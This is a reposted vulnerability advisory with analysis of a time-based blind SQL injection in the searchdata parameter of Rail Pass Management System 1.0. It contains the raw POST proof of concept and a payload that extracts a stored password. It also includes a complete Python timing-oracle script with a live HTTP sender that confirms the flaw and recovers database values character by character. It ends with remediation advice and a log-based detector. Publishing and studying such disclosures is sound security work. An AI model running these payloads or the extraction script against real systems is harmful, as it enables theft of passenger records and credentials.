Rail Pass Management System 1.0 - Time-Based SQL Injection

Exploit Author: yozgatalperen1 Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2024-02-09
# Exploit Title: Rail Pass Management System - 'searchdata' Time-Based SQL Injection
# Date: 02/10/2023
# Exploit Author: Alperen Yozgat
# Vendor Homepage: https://phpgurukul.com/rail-pass-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17479
# Version: 1.0
# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30

## Description ##

The searchdata parameter of the search function on download-pass.php is vulnerable to time-based (blind) SQL injection: its value is placed into the SQL query without a prepared statement or escaping.

## Proof of Concept ##

# After sending the payload, the response time will increase to at least 5 seconds.
# Payload: 1'or+sleep(5)--+-

POST /rpms/download-pass.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Cookie: PHPSESSID=6028f950766b973640e0ff64485f727b


searchdata=1'or+sleep(5)--+-&search=


Rail Pass Management System 1.0 – Time-Based SQL Injection Vulnerability Analysis

SQL injection remains one of the most common flaws in small PHP web applications, including ones that hold personal data such as passenger records. One example is the Rail Pass Management System 1.0 from phpgurukul.com, which manages the issuance and lookup of rail passes. Its download-pass.php endpoint contains a time-based blind SQL injection flaw.

Overview of the Vulnerability

The flaw is in the searchdata parameter handled by download-pass.php. The value typed into the search field is concatenated into the SQL statement without a prepared statement or any escaping, so an attacker can close the string literal and append SQL of their own, in this case a call to MySQL's sleep() function that delays the query.

This is a time-based blind SQL injection: the attacker learns whether the injected condition held by watching how long the server takes to respond. It is still a one-bit-per-request oracle, exactly like Boolean-based blind injection; the difference is the channel. A Boolean-based attack needs a visible difference in the page for true versus false, whereas a time-based attack only needs the database to pause for a chosen duration, so it works even when the page looks identical either way.

Proof of Concept: Exploitation Steps

Attackers can exploit this vulnerability by sending a crafted POST request with the searchdata parameter set to a payload that forces the database to delay processing.


POST /rpms/download-pass.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Cookie: PHPSESSID=6028f950766b973640e0ff64485f727b

searchdata=1'or+sleep(5)--+-&search=

Explanation: the payload 1'or+sleep(5)--+- arrives URL-decoded as 1'or sleep(5)-- - (each + becomes a space) and exploits the query structure as follows:

  • 1' – 1 is an ordinary search value and the quote closes the string literal the application opened around it.
  • or sleep(5) – appends an OR condition that calls MySQL's sleep() function; it is evaluated for every row on which the original condition is false, and each evaluation pauses the query for 5 seconds.
  • -- - – comments out the rest of the application's query, including its own closing quote, so the statement stays syntactically valid. MySQL requires whitespace after --, which is why the payload encodes a + there; the trailing - keeps that space from being trimmed off the end of the parameter.

When this payload is sent, the response arrives at least 5 seconds later than a normal search. Because sleep() is evaluated once per row the WHERE clause scans, the delay grows with the table size and may be a multiple of 5 seconds. Measure a baseline first, send the probe more than once, and treat only a consistent delay of at least the chosen value as confirmation; a single slow response can be nothing more than network jitter.

Why Time-Based Injection is Effective

Time-based SQL injection is the technique of choice when:

  • The application shows no query output and no error messages, so union-based and error-based extraction are impossible.
  • The page content is identical whether the injected condition is true or false, so a Boolean-based blind attack has nothing to observe.
  • Only the timing side channel is left, and timing can be observed from anywhere on the network.

sleep() and benchmark() in MySQL, pg_sleep() in PostgreSQL and WAITFOR DELAY in SQL Server all provide that delay. The technique is not inherently stealthier at the signature level: sleep( and benchmark( are trivial to match, and the payloads still contain the quote break-out and comment terminator that generic injection rules look for. Its advantage is that it needs nothing from the response except its arrival time.

Impact and Risks

Risk factor and description:

  • Database exposure – by chaining many conditional delays an attacker can read any data the application's database account can see, such as user records, pass details and personal information, one character per request.
  • Denial of service – every injected sleep() holds a database connection and a PHP worker for its duration; a handful of concurrent requests with long delays can exhaust max_connections or the web server's worker pool.
  • Privilege escalation – the same oracle can enumerate information_schema to map the schema and then extract administrator credentials (or their hashes), giving access to the application's administrative functions.

Given that this system is intended for managing rail passes—potentially involving passenger data, travel schedules, and authorization—this vulnerability could lead to unauthorized access, data leaks, or even impersonation attacks.

Real-World Use Case: Data Extraction via Time-Based Injection

Once the vulnerability is confirmed, attackers can use a systematic approach to extract information:


searchdata=1'or+substring((select+password+from+users+limit+1),1,1)='a'+and+sleep(1)--+-&search=

Explanation: the injected condition is '1' or (substring(...)='a' and sleep(1)). AND binds tighter than OR and MySQL short-circuits it, so sleep(1) is only reached when the first character of the password column in the users table is a (the table and column names are illustrative; a real attack first enumerates them from information_schema). If the guess is right the response is delayed by at least 1 second; otherwise it returns at normal speed. The order matters: writing sleep(1) and substring(...)='a' instead evaluates sleep() first on every row and delays the response regardless of the guess, so the oracle learns nothing. Testing every candidate character at every position in turn reconstructs the value.

The process is slow, up to one request per candidate character per position (about seven per position with a binary search on the character code), and each request looks unremarkable, so it is easy to miss in a web access log, which does not record POST bodies. It is far from invisible in the database's own logs, where the sleep() calls and the burst of near-identical statements stand out.
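The confirmation and extraction steps above as a working timing oracle, written here as an added example in Python; it is not code from the advisory, from bubbleslearn.ir or from phpgurukul. Everything not in the advisory is an assumption: the users/password names, the target URL and cookie handed to http_sender, the hex guess alphabet, and simulated_sender, a constructed stand-in for the live endpoint so the logic can run offline.

```python
"""Time-based blind SQL injection oracle for the searchdata parameter.

Added example, not code from the advisory or the vendor. Assumed (not
established by the advisory): the target URL and session cookie, a 'users'
table with a 'password' column, and a DB account allowed to call sleep().
"""
import re
import statistics
import time
import urllib.parse
import urllib.request

# Guess alphabet per position. Hex keeps quotes and backslashes out of the
# injected literal; widen it (with escaping) for real targets.
CHARSET = "0123456789abcdef"


def confirm_payload(delay: int = 5) -> str:
    """Advisory payload, URL-decoded: 1' closes the literal, OR makes MySQL
    evaluate sleep() per scanned row, '-- -' comments out the app's tail
    (MySQL needs the space after --; the final '-' stops it being trimmed)."""
    return f"1' or sleep({delay})-- -"


def probe_payload(position: int, guess: str, delay: int = 1,
                  column: str = "password", table: str = "users") -> str:
    """One yes/no question: is character <position> of <column> == <guess>?
    AND binds tighter than OR and MySQL short-circuits it, so the comparison
    goes BEFORE sleep(): the server only sleeps when the guess is right.
    ('sleep() AND cmp' would sleep on every row whatever the guess.)"""
    if len(guess) != 1 or guess in "'\\":
        raise ValueError("guess must be a single quote-safe character")
    return (f"1' or (substring((select {column} from {table} limit 1),"
            f"{position},1)='{guess}' and sleep({delay}))-- -")


def http_sender(url: str, phpsessid: str):
    """Real transport: POST searchdata=<payload>&search= (the advisory's
    request shape) and return elapsed wall-clock seconds."""
    def send(payload: str) -> float:
        body = urllib.parse.urlencode({"searchdata": payload, "search": ""}).encode()
        req = urllib.request.Request(url, data=body,
                                     headers={"Cookie": f"PHPSESSID={phpsessid}"})
        start = time.monotonic()
        with urllib.request.urlopen(req, timeout=120) as resp:
            resp.read()
        return time.monotonic() - start
    return send


def simulated_sender(secret: str, rows: int = 3, base: float = 0.1):
    """Constructed offline stand-in for http_sender: evaluates the payload the
    way MySQL would and returns the response time that would result, without
    sleeping. 'rows' models the rows the WHERE clause scans, which multiplies
    the delay on a real server."""
    confirm = re.compile(r"^1' or sleep\((\d+)\)-- -$")
    probe = re.compile(r",(\d+),1\)='(.)' and sleep\((\d+)\)\)-- -$")

    def send(payload: str) -> float:
        m = confirm.match(payload)
        if m:
            return base + rows * int(m.group(1))
        m = probe.search(payload)
        if m:
            pos, guess, delay = int(m.group(1)), m.group(2), int(m.group(3))
            if pos <= len(secret) and secret[pos - 1] == guess:
                return base + rows * delay
        return base
    return send


def measure_baseline(send, samples: int = 3) -> float:
    """Median timing of a benign search; re-measure if the link gets noisy."""
    return statistics.median(send("1") for _ in range(samples))


def is_delayed(send, payload: str, baseline: float, delay: int, repeats: int = 2) -> bool:
    """True only if every repetition is at least `delay` seconds over the
    baseline; repeating filters out one-off network jitter."""
    return all(send(payload) - baseline >= delay for _ in range(repeats))


def confirm_injection(send, delay: int = 5) -> bool:
    return is_delayed(send, confirm_payload(delay), measure_baseline(send), delay)


def extract(send, max_length: int, charset: str = CHARSET, delay: int = 1) -> str:
    """Recover a value one character at a time; stops at the first position
    where no guess produces a delay (end of value, or a char outside charset)."""
    baseline = measure_baseline(send)
    recovered = ""
    for position in range(1, max_length + 1):
        for ch in charset:
            if is_delayed(send, probe_payload(position, ch, delay), baseline, delay):
                recovered += ch
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    # Offline demo against a constructed secret; for a live test swap in
    # http_sender("http://localhost/rpms/download-pass.php", "<PHPSESSID>").
    fake = simulated_sender("4f2a")
    print("injection confirmed:", confirm_injection(fake))
    print("recovered:", extract(fake, 8))
```

The oracle compares every probe against a measured baseline and requires the delay to repeat before accepting it, which is what separates a real sleep() from a slow network. On a live target the observed delay is the chosen value multiplied by the number of rows the WHERE clause scans, so keep the per-probe delay short and the request timeout generous.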

Security Recommendations

To prevent such vulnerabilities, developers should implement the following best practices:

  • Use parameterized queries – build every statement with a prepared statement and bound parameters (PDO or MySQLi placeholders) instead of concatenating user input into SQL; this is the fix, everything below is defense in depth.
  • Validate input – check searchdata against an allow-list or a strict pattern (a pass number has a known shape) and reject anything else; this narrows the attack surface but does not replace prepared statements.
  • Least privilege and query time limits – MySQL has no switch that disables sleep() or benchmark(); instead run the application under a database account without the FILE privilege (so load_file() and INTO OUTFILE fail) and cap query runtime with max_execution_time (MySQL 5.7+) or max_statement_time (MariaDB) so a sleeping query cannot hold connections open.
  • Enable logging and monitoring – alert on statements containing sleep(), benchmark() or a comment marker before the closing quote, on unusual SELECT latency in the slow query log, and on bursts of near-identical requests from one session.
  • Apply WAF rules – a web application firewall that matches known injection patterns, including timing functions, blocks unsophisticated attempts and buys time while the code is fixed.
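The logging and monitoring recommendation, as an added Python example (not code from the advisory or the vendor) that runs the two checks a database-side detector would apply over a MySQL general query log: timing functions in a statement, and a comment marker followed by an orphaned closing quote. The log lines are constructed for the example in the MySQL 5.7+ general_log FILE format, and the table and column names in them are illustrative rather than the application's real schema.

```python
"""Detect time-based SQL injection probes in a MySQL general query log.

Added example, not part of the advisory or the vendor's code. SAMPLE_LOG is
constructed (MySQL 5.7+ general_log FILE format) and its table/column names
are illustrative, not the application's actual schema.
"""
import re
from collections import Counter

TIMING_FUNCS = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
# A comment marker followed by a trailing quote is the fingerprint of a quote
# break-out: the application's own closing quote ends up inside the comment.
ORPHANED_QUOTE = re.compile(r"(--\s|#|/\*).*'\s*$")
# general_log line: <timestamp>\t<conn id> <command>\t<argument>
LOG_LINE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<conn>\d+) (?P<cmd>\w+)\t(?P<text>.*)$")


def _line(ts, conn, cmd, text):
    return f"{ts}\t{conn:>5} {cmd}\t{text}"


SAMPLE_LOG = "\n".join(
    [
        _line("2024-02-09T10:15:01.000000Z", 42, "Connect", "rpms@localhost on rpms using TCP/IP"),
        _line("2024-02-09T10:15:01.100000Z", 42, "Query", "SELECT * FROM pass WHERE pass_id='RP1001'"),
        _line("2024-02-09T10:15:07.300000Z", 42, "Query", "SELECT * FROM pass WHERE pass_id='1' or sleep(5)-- -'"),
        _line("2024-02-09T10:15:08.000000Z", 42, "Query", "SELECT * FROM pass WHERE pass_id='1' or benchmark(5000000,md5(1))-- -'"),
    ]
    + [  # 24 character probes on one connection: an extraction loop's footprint
        _line(f"2024-02-09T10:16:{i:02d}.000000Z", 43, "Query",
              "SELECT * FROM pass WHERE pass_id='1' or (substring((select password "
              f"from users limit 1),1,1)='{c}' and sleep(1))-- -'")
        for i, c in enumerate("0123456789abcdefghijklmn")
    ]
)


def parse_general_log(text):
    """Yield (timestamp, connection id, statement) for every Query entry."""
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m and m.group("cmd") == "Query":
            yield m.group("ts"), int(m.group("conn")), m.group("text")


def classify(query):
    """Reasons a statement looks like an injection probe (empty if benign)."""
    reasons = []
    if TIMING_FUNCS.search(query):
        reasons.append("timing function")
    if ORPHANED_QUOTE.search(query):
        reasons.append("comment before trailing quote")
    return reasons


def find_injection_attempts(text, burst_threshold=20):
    """Return (findings, bursts): every suspicious statement, and the
    connections that issued at least burst_threshold of them, which is what
    a character-by-character extraction looks like from the database side."""
    findings, per_conn = [], Counter()
    for ts, conn, query in parse_general_log(text):
        reasons = classify(query)
        if reasons:
            per_conn[conn] += 1
            findings.append({"ts": ts, "conn": conn, "reasons": reasons, "query": query})
    bursts = {conn: n for conn, n in per_conn.items() if n >= burst_threshold}
    return findings, bursts


if __name__ == "__main__":
    findings, bursts = find_injection_attempts(SAMPLE_LOG)
    for f in findings[:3]:
        print(f["ts"], f["conn"], ", ".join(f["reasons"]))
    print("burst connections:", bursts)
```

The general log records every statement and is too expensive to leave on in production; the same classify() logic applies to the slow query log (where a sleeping SELECT lands whenever its runtime exceeds long_query_time) or to statements sampled from performance_schema. Web access logs are not a substitute here, because they do not record the POST body that carries the payload.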

Conclusion

The Rail Pass Management System 1.0 serves as a cautionary example of how even seemingly simple applications can harbor serious security flaws. The time-based SQL injection vulnerability in download-pass.php demonstrates that attackers can exploit delays in response time to confirm and extract data without triggering obvious alerts.

As cyber threats evolve, developers must prioritize secure coding practices, especially when handling sensitive data. The use of time-based injection underscores the need for proactive security measures—not just reactive fixes.